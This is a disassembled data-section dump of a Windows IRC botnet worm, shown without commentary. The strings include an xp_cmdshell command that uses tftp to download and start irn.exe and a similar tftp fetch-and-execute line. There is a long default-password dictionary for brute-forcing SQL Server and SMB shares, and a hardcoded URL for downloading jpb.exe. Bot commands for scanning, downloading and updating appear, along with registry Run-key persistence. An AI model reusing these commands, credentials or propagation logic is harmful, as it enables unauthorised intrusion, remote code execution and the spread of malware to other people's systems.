dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
dd offset aCopyConstructo ; "`copy constructor closure'"
dd offset aUdtReturning ; "`udt returning'"
dd offset off_41E854
dd offset aRtti ; "`RTTI"
dd offset aLocalVftable ; "`local vftable'"
dd offset aLocalVftableCo ; "`local vftable constructor closure'"
dd offset aNew ; " new[]"
dd offset aDelete ; " delete[]"
dd offset aOmniCallsig ; "`omni callsig'"
dd offset aPlacementDel_0 ; "`placement delete closure'"
dd offset aPlacementDelet ; "`placement delete[] closure'"
dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
dd offset aManagedVectorD ; "`managed vector destructor iterator'"
dd offset aEhVectorCopyCo ; "`eh vector copy constructor iterator'"
dd offset aEhVectorVbaseC ; "`eh vector vbase copy constructor itera"...
dd offset aDynamicInitial ; "`dynamic initializer for '"
dd offset aDynamicAtexitD ; "`dynamic atexit destructor for '"
dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset word_41D492
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F8D4+C1o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F8D4+A9o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40F8D4+6Do
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40F8D4+58o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40F8D4+46o
aUser32_dll_0 db 'USER32.DLL',0 ; DATA XREF: sub_40F8D4+28o
align 4
off_41EDA4 dd offset sub_40FB1C ; DATA XREF: sub_407D29r sub_407D29+9o ...
dd offset nullsub_480
dd offset nullsub_480
a_nextafter db '_nextafter',0
align 4
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 10h
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 10h
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 10h
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dbl_41EE28 dq 0.0 ; DATA XREF: sub_40FED1+143r
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_410E04:loc_410EDCo
align 4
dbl_41EE78 dq 4.195835e6 ; DATA XREF: sub_411744+Fr
dbl_41EE80 dq 3.145727e6 ; DATA XREF: sub_411744+6r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_411780+Fo
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_411780o
align 10h
aConout db 'CONOUT$',0 ; DATA XREF: sub_4117DB+Eo
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_412E61:loc_412F90o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_412E61+103o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_412E61+F4o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_412E61+DCo
align 4
aBadAllocation db 'bad allocation',0 ; DATA XREF: .data:00424520o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: .text:0041CC8Co
align 4
aScan_stop db 'scan.stop',0 ; DATA XREF: .text:0041CCA8o
byte_41EEFE db 0 ; DATA XREF: sub_41AFF3+9Co
byte_41EEFF db 0 ; DATA XREF: sub_41AFF3+A8o
dword_41EF00 dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: .text:0041CCC4o
dword_41EF0C dd 252E6425h, 64252E64h, 64252Eh ; DATA XREF: sub_413DDD+4Ao
byte_41EF18 db 25h, 73h, 0 ; DATA XREF: sub_413DDD+18Co
db 0 ; DATA XREF: .data:off_425830o
byte_41EF1C db 25h, 73h, 0 ; DATA XREF: sub_413DDD+29Co
byte_41EF1F db 0 ; DATA XREF: sub_41BF2B+1DDo
dword_41EF20 dd 7325h ; DATA XREF: sub_413DDD+386o
dword_41EF24 dd 7325h, 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
; DATA XREF: sub_413DDD+495o
; .data:00424524o
aTftpISGetIrn_e db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
; DATA XREF: sub_41ABCA+F2o
aBadAllocatio_0 db 'bad allocation',0 ; DATA XREF: .data:004245D8o
align 4
aBadAllocatio_1 db 'bad allocation',0 ; DATA XREF: .data:004245DCo
align 4
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:00425814o
align 4
aIpc:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
dd 2 dup(0)
aIpc_0:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
a_: ; DATA XREF: sub_41AFF3+57o
unicode 0, <.>,0
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_41AFF3+76o
align 4
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_41AFF3+CAo
align 4
dword_41F00C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_41AFF3+191o
dword_41F020 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
; DATA XREF: sub_41AFF3+1ACo
; ---------------------------------------------------------------------------
jmp short near ptr dword_41F040
; ---------------------------------------------------------------------------
align 10h
dword_41F040 dd 0 ; CODE XREF: fabskl8p:0041F03Cj
aHttpSDS_0 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41AFF3+3D6o
aHttpSDS_1 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41AFF3+457o
aSExploitedS_ db '%s: Exploited: %s.',0 ; DATA XREF: sub_41AFF3+774o
align 4
aBadAllocatio_2 db 'bad allocation',0 ; DATA XREF: .data:00425828o
align 4
aSa db 'sa',0 ; DATA XREF: sub_41B7A3+55o
align 4
aRoot db 'root',0 ; DATA XREF: sub_41B7A3+5Co
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_41B7A3+63o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_41B7A3+10Co
align 10h
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
; DATA XREF: sub_41B7A3+19Ao
db '&exit',0Dh,0Ah
db 27h,0
align 4
aSExploitedS__0 db '%s: Exploited %s.',0 ; DATA XREF: sub_41B7A3+1F4o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .data:00425834o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .data:00425838o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: .data:0042583Co
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .data:00425840o
aAdmins db 'admins',0 ; DATA XREF: .data:00425844o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: .data:00425848o
align 4
aAdm db 'adm',0 ; DATA XREF: .data:0042584Co
aPassword1 db 'password1',0 ; DATA XREF: .data:00425850o
align 4
aPassword db 'password',0 ; DATA XREF: .data:00425854o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .data:00425858o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .data:0042585Co
align 4
aPass db 'pass',0 ; DATA XREF: .data:00425860o
align 10h
aPwd db 'pwd',0 ; DATA XREF: .data:00425864o
a007 db '007',0 ; DATA XREF: .data:00425868o
a1: ; DATA XREF: .data:0042586Co
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: .data:00425870o
align 10h
a123 db '123',0 ; DATA XREF: .data:00425874o
a1234 db '1234',0 ; DATA XREF: .data:00425878o
align 4
a12345 db '12345',0 ; DATA XREF: .data:0042587Co
align 4
a123456 db '123456',0 ; DATA XREF: .data:00425880o
align 4
a1234567 db '1234567',0 ; DATA XREF: .data:00425884o
a12345678 db '12345678',0 ; DATA XREF: .data:00425888o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .data:0042588Co
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .data:00425890o
align 4
a2000 db '2000',0 ; DATA XREF: .data:00425894o
align 10h
a2001 db '2001',0 ; DATA XREF: .data:00425898o
align 4
a2002 db '2002',0 ; DATA XREF: .data:0042589Co
align 10h
a2003 db '2003',0 ; DATA XREF: .data:004258A0o
align 4
a2004 db '2004',0 ; DATA XREF: .data:004258A4o
align 10h
aTest db 'test',0 ; DATA XREF: .data:004258A8o
align 4
aGuest db 'guest',0 ; DATA XREF: .data:004258ACo
align 10h
aNone db 'none',0 ; DATA XREF: .data:004258B0o
align 4
aDemo db 'demo',0 ; DATA XREF: .data:004258B4o
align 10h
aUnix db 'unix',0 ; DATA XREF: .data:004258B8o
align 4
aLinux db 'linux',0 ; DATA XREF: .data:004258BCo
align 10h
aChangeme db 'changeme',0 ; DATA XREF: .data:004258C0o
align 4
aDefault db 'default',0 ; DATA XREF: .data:004258C4o
aSystem_0 db 'system',0 ; DATA XREF: .data:004258C8o
align 4
aServer db 'server',0 ; DATA XREF: .data:004258CCo
align 4
aRoot_0 db 'root',0 ; DATA XREF: .data:004258D0o
align 4
aNull_1 db 'null',0 ; DATA XREF: .data:004258D4o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .data:004258D8o
align 4
aMail db 'mail',0 ; DATA XREF: .data:004258DCo
align 4
aOutlook db 'outlook',0 ; DATA XREF: .data:004258E0o
aWeb db 'web',0 ; DATA XREF: .data:004258E4o
aWww db 'www',0 ; DATA XREF: .data:004258E8o
aInternet db 'internet',0 ; DATA XREF: .data:004258ECo
align 10h
aAccounts db 'accounts',0 ; DATA XREF: .data:004258F0o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .data:004258F4o
align 4
aHome db 'home',0 ; DATA XREF: .data:004258F8o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .data:004258FCo
align 4
aUser db 'user',0 ; DATA XREF: .data:00425900o
align 4
aOem db 'oem',0 ; DATA XREF: .data:00425904o
aOemuser db 'oemuser',0 ; DATA XREF: .data:00425908o
aOeminstall db 'oeminstall',0 ; DATA XREF: .data:0042590Co
align 4
aWindows db 'windows',0 ; DATA XREF: .data:00425910o
aWin98 db 'win98',0 ; DATA XREF: .data:00425914o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .data:00425918o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .data:0042591Co
align 4
aWinnt db 'winnt',0 ; DATA XREF: .data:00425920o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: .data:00425924o
aQaz db 'qaz',0 ; DATA XREF: .data:00425928o
aAsd db 'asd',0 ; DATA XREF: .data:0042592Co
aZxc db 'zxc',0 ; DATA XREF: .data:00425930o
aQwe db 'qwe',0 ; DATA XREF: .data:00425934o
aBob db 'bob',0 ; DATA XREF: .data:00425938o
aJen db 'jen',0 ; DATA XREF: .data:0042593Co
aJoe db 'joe',0 ; DATA XREF: .data:00425940o
aFred db 'fred',0 ; DATA XREF: .data:00425944o
align 10h
aBill db 'bill',0 ; DATA XREF: .data:00425948o
align 4
aMike db 'mike',0 ; DATA XREF: .data:0042594Co
align 10h
aJohn db 'john',0 ; DATA XREF: .data:00425950o
align 4
aPeter db 'peter',0 ; DATA XREF: .data:00425954o
align 10h
aLuke db 'luke',0 ; DATA XREF: .data:00425958o
align 4
aSam db 'sam',0 ; DATA XREF: .data:0042595Co
aSue db 'sue',0 ; DATA XREF: .data:00425960o
aSusan db 'susan',0 ; DATA XREF: .data:00425964o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .data:00425968o
align 10h
aBrian db 'brian',0 ; DATA XREF: .data:0042596Co
align 4
aLee db 'lee',0 ; DATA XREF: .data:00425970o
aNeil db 'neil',0 ; DATA XREF: .data:00425974o
align 4
aIan db 'ian',0 ; DATA XREF: .data:00425978o
aChris db 'chris',0 ; DATA XREF: .data:0042597Co
align 10h
aEric db 'eric',0 ; DATA XREF: .data:00425980o
align 4
aGeorge db 'george',0 ; DATA XREF: .data:00425984o
align 10h
aKate db 'kate',0 ; DATA XREF: .data:00425988o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .data:0042598Co
aKatie db 'katie',0 ; DATA XREF: .data:00425990o
align 4
aMary db 'mary',0 ; DATA XREF: .data:00425994o
align 4
aLogin db 'login',0 ; DATA XREF: .data:00425998o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .data:0042599Co
align 10h
aTechnical db 'technical',0 ; DATA XREF: .data:004259A0o
align 4
aBackup db 'backup',0 ; DATA XREF: .data:004259A4o
align 4
aExchange db 'exchange',0 ; DATA XREF: .data:004259A8o
align 10h
aFuck db 'fuck',0 ; DATA XREF: .data:004259ACo
align 4
aBitch db 'bitch',0 ; DATA XREF: .data:004259B0o
align 10h
aSlut db 'slut',0 ; DATA XREF: .data:004259B4o
align 4
aSex db 'sex',0 ; DATA XREF: .data:004259B8o
aGod db 'god',0 ; DATA XREF: .data:004259BCo
aHell db 'hell',0 ; DATA XREF: .data:004259C0o
align 4
aHello db 'hello',0 ; DATA XREF: .data:004259C4o
align 10h
aDomain db 'domain',0 ; DATA XREF: .data:004259C8o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .data:004259CCo
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:004259D0o
align 4
aDatabase db 'database',0 ; DATA XREF: .data:004259D4o
align 10h
aAccess db 'access',0 ; DATA XREF: .data:004259D8o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:004259DCo
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:004259E0o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:004259E4o
align 4
aData db 'data',0 ; DATA XREF: .data:004259E8o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:004259ECo
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:004259F0o
aDb2 db 'db2',0 ; DATA XREF: .data:004259F4o
aDb1234 db 'db1234',0 ; DATA XREF: .data:004259F8o
align 4
aSa_0 db 'sa',0 ; DATA XREF: .data:004259FCo
align 4
aSql db 'sql',0 ; DATA XREF: .data:00425A00o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:00425A04o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00425A08o
align 10h
aOracle db 'oracle',0 ; DATA XREF: .data:00425A0Co
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:00425A10o
aCisco db 'cisco',0 ; DATA XREF: .data:00425A14o
align 4
aDell db 'dell',0 ; DATA XREF: .data:00425A18o
align 4
aCompaq db 'compaq',0 ; DATA XREF: .data:00425A1Co
align 4
aSiemens db 'siemens',0 ; DATA XREF: .data:00425A20o
aHp db 'hp',0 ; DATA XREF: .data:00425A24o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .data:00425A28o
align 4
aXp db 'xp',0 ; DATA XREF: .data:00425A2Co
align 4
aControl db 'control',0 ; DATA XREF: .data:00425A30o
aOffice db 'office',0 ; DATA XREF: .data:00425A34o
align 4
aBlank db 'blank',0 ; DATA XREF: .data:00425A38o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .data:00425A3Co
aMain db 'main',0 ; DATA XREF: .data:00425A40o
align 4
aLan db 'lan',0 ; DATA XREF: .data:00425A44o
aInternet_0 db 'internet',0 ; DATA XREF: .data:00425A48o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .data:00425A4Co
align 10h
aStudent db 'student',0 ; DATA XREF: .data:00425A50o
aTeacher db 'teacher',0 ; DATA XREF: .data:00425A54o
aStaff db 'staff',0 ; DATA XREF: .data:00425A58o
align 4
aBadAllocatio_3 db 'bad allocation',0 ; DATA XREF: .data:0042582Co
align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_41ADC3+21o
align 4
aMhz db '~MHz',0 ; DATA XREF: sub_41ADC3+4Ao
align 10h
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_41ADC3+6Do
aS_7 db '%s',0 ; DATA XREF: sub_41ADC3+ADo
align 4
aSC_0 db '%s%c',0 ; DATA XREF: sub_41ADC3+112o
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_41ADC3+165o
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
; DATA XREF: sub_41ADC3+1B7o
aSysinfo db 'sysinfo',0 ; DATA XREF: .text:0041CC46o
aNetinfo db 'netinfo',0 ; DATA XREF: .text:0041CC62o
aBadAllocatio_4 db 'bad allocation',0 ; DATA XREF: .data:00425A60o
align 4
aS4 db 's4',0 ; DATA XREF: .text:0041CC0Eo
align 4
aS4_stop db 's4.stop',0 ; DATA XREF: .text:0041CC2Ao
aS4SocketError db 'S4: socket() Error',0
align 4
aS4BindError db 'S4: bind() Error',0 ; DATA XREF: sub_4145BE+A8o
align 4
aS4ListenError db 'S4: listen() Error',0 ; DATA XREF: sub_4145BE+C1o
align 10h
aS4SI db 'S4: %s:%i',0 ; DATA XREF: sub_4145BE+135o
align 4
aSc db 'SC',0 ; DATA XREF: sub_4145BE+191o
align 10h
aBadAllocatio_5 db 'bad allocation',0 ; DATA XREF: .data:00425A64o
align 10h
aHttp db 'http',0 ; DATA XREF: .text:0041CBF2o
align 4
aBadAllocatio_6 db 'bad allocation',0 ; DATA XREF: .data:00425A68o
align 4
aI_quit db 'i.quit',0 ; DATA XREF: .text:0041CB9Eo
align 10h
aI_join db 'i.join',0 ; DATA XREF: .text:0041CBBAo
align 4
aI_part db 'i.part',0 ; DATA XREF: .text:0041CBD6o
align 10h
aBadAllocatio_7 db 'bad allocation',0 ; DATA XREF: .data:00425A6Co
align 10h
aHttp217_67_229 db 'http://217.67.229.212/phpbb/uploads/jpb.exe',0
; DATA XREF: sub_41C18A+51o
aCJpb_exe db 'C:\jpb.exe',0 ; DATA XREF: sub_41C18A+84o
align 4
aDl db 'DL',0 ; DATA XREF: sub_41C18A+E9o
align 4
aDownload db 'download',0 ; DATA XREF: .text:0041CB66o
align 4
aUpdate db 'update',0 ; DATA XREF: .text:0041CB82o
align 10h
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: sub_41BF2B+33o
aDlDownloadingS db 'DL: Downloading %s to %s',0 ; DATA XREF: sub_41BF2B+51o
align 4
aDlFailedBadLoc db 'DL: Failed; Bad Location.',0 ; DATA XREF: sub_41BF2B:loc_41C0F5o
align 4
aDlDownloadSIBy db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
; DATA XREF: sub_41BF2B+156o
align 10h
aMainUninstalli db 'Main: Uninstalling Drone',0 ; DATA XREF: sub_41BF2B+1A7o
align 4
aDlFailedToUpda db 'DL: Failed To Update',0 ; DATA XREF: sub_41BF2B:loc_41C0FCo
align 4
aDlErrorExecuti db 'DL: Error Executing File.',0 ; DATA XREF: sub_41BF2B+1EDo
align 10h
aDlExecutedFile db 'DL: Executed File: %s',0 ; DATA XREF: sub_41BF2B+1FCo
align 4
aDlFailedBadUrl db 'DL: Failed; Bad URL',0 ; DATA XREF: sub_41BF2B:loc_41C143o
aDlFailedWinine db 'DL: Failed; WinINET Error',0 ; DATA XREF: sub_41BF2B:loc_41C14Ao
align 4
aBadAllocatio_8 db 'bad allocation',0 ; DATA XREF: .data:00425A70o
align 4
aBadAllocatio_9 db 'bad allocation',0 ; DATA XREF: .data:00425A74o
align 4
aTftpServer db 'TFTP Server',0 ; DATA XREF: sub_41BD7B+5Ao
aRb db 'rb',0 ; DATA XREF: sub_41B9D6+44o
align 4
aTftpSendComple db 'TFTP: Send Complete To %s. %d Total Sends',0
; DATA XREF: sub_41B9D6+1A4o
align 4
aBadAllocati_10 db 'bad allocation',0 ; DATA XREF: .data:00425A78o
align 8
dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
dd 6CA6351h, 14292967h, 27B70A85h, 2E1B2138h, 4D2C6DFCh
dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
dd 1F83D9ABh, 5BE0CD19h
dword_41F9F8 dd 0D728AE22h ; DATA XREF: sub_414BC0+318r
dword_41F9FC dd 428A2F98h ; DATA XREF: sub_414BC0+31Fr
dword_41FA00 dd 23EF65CDh ; DATA XREF: sub_414BC0+548r
dword_41FA04 dd 71374491h ; DATA XREF: sub_414BC0+54Fr
dword_41FA08 dd 0EC4D3B2Fh ; DATA XREF: sub_414BC0+772r
dword_41FA0C dd 0B5C0FBCFh ; DATA XREF: sub_414BC0+779r
dword_41FA10 dd 8189DBBCh ; DATA XREF: sub_414BC0+9B8r
dword_41FA14 dd 0E9B5DBA5h ; DATA XREF: sub_414BC0+9BFr
dword_41FA18 dd 0F348B538h ; DATA XREF: sub_414BC0+BFEr
dword_41FA1C dd 3956C25Bh ; DATA XREF: sub_414BC0+C09r
dword_41FA20 dd 0B605D019h ; DATA XREF: sub_414BC0+E80r
dword_41FA24 dd 59F111F1h ; DATA XREF: sub_414BC0+E87r
dword_41FA28 dd 0AF194F9Bh ; DATA XREF: sub_414BC0+10D7r
dword_41FA2C dd 923F82A4h ; DATA XREF: sub_414BC0+10DEr
dword_41FA30 dd 0DA6D8118h ; DATA XREF: sub_414BC0+1319r
dword_41FA34 dd 0AB1C5ED5h ; DATA XREF: sub_414BC0+1320r
dword_41FA38 dd 0A3030242h ; DATA XREF: sub_414BC0+1569r
dword_41FA3C dd 0D807AA98h ; DATA XREF: sub_414BC0+1570r
dword_41FA40 dd 45706FBEh ; DATA XREF: sub_414BC0+17ABr
dword_41FA44 dd 12835B01h ; DATA XREF: sub_414BC0+17B2r
dword_41FA48 dd 4EE4B28Ch ; DATA XREF: sub_414BC0+19F3r
dword_41FA4C dd 243185BEh ; DATA XREF: sub_414BC0+19FAr
dword_41FA50 dd 0D5FFB4E2h ; DATA XREF: sub_414BC0+1C39r
dword_41FA54 dd 550C7DC3h ; DATA XREF: sub_414BC0+1C40r
dword_41FA58 dd 0F27B896Fh ; DATA XREF: sub_414BC0+1E91r
dword_41FA5C dd 72BE5D74h ; DATA XREF: sub_414BC0+1E9Cr
dword_41FA60 dd 3B1696B1h ; DATA XREF: sub_414BC0+210Dr
dword_41FA64 dd 80DEB1FEh ; DATA XREF: sub_414BC0+2114r
dword_41FA68 dd 25C71235h ; DATA XREF: sub_414BC0+236Ar
dword_41FA6C dd 9BDC06A7h ; DATA XREF: sub_414BC0+2371r
dword_41FA70 dd 0CF692694h ; DATA XREF: sub_414BC0+25B8r
dword_41FA74 dd 0C19BF174h ; DATA XREF: sub_414BC0+25BFr
dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh, 831153B5h
dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h, 0A831C66Dh
dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h, 0B8D2D0C8h
dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h, 2748774Ch
dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h, 682E6FF3h
dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh, 113F9804h
dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h, 0CBBB9D5Dh
dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h, 8EB44A87h
dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
byte_41FEF8 db 8, 0C9h ; DATA XREF: sub_414B90+17o
; ---------------------------------------------------------------------------
mov esp, 9E667F3h
push 3Bh
cmpsd
retf 8584h
; ---------------------------------------------------------------------------
db 0AEh, 67h, 0BBh
dd 0FE94F82Bh, 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h
dd 510E527Fh, 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh, 1F83D9ABh
dd 137E2179h, 5BE0CD19h, 90h dup(0)
dword_420178 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_420198 dd 255C7325h, 73h ; DATA XREF: sub_417776+DCo
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417776+10Co
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417776+14Fo
align 10h
aSS_3 db '%s\%s',0 ; DATA XREF: sub_417909+BAo
align 4
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417909+F9o
align 4
aSoftwareMicr_2 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417909+14Do
align 4
aBadAllocati_11 db 'bad allocation',0 ; DATA XREF: .data:00425C2Co
align 4
aInstall db '--install ',0 ; DATA XREF: sub_41C2E2:loc_41C322o
align 4
aSS_6 db '%s\%s',0 ; DATA XREF: sub_41C2E2+EEo
align 4
aSSS_0 db '%s %s%s',0 ; DATA XREF: sub_41C2E2+1BCo
aS_11 db '%s',0 ; DATA XREF: sub_41C2E2+252o
align 4
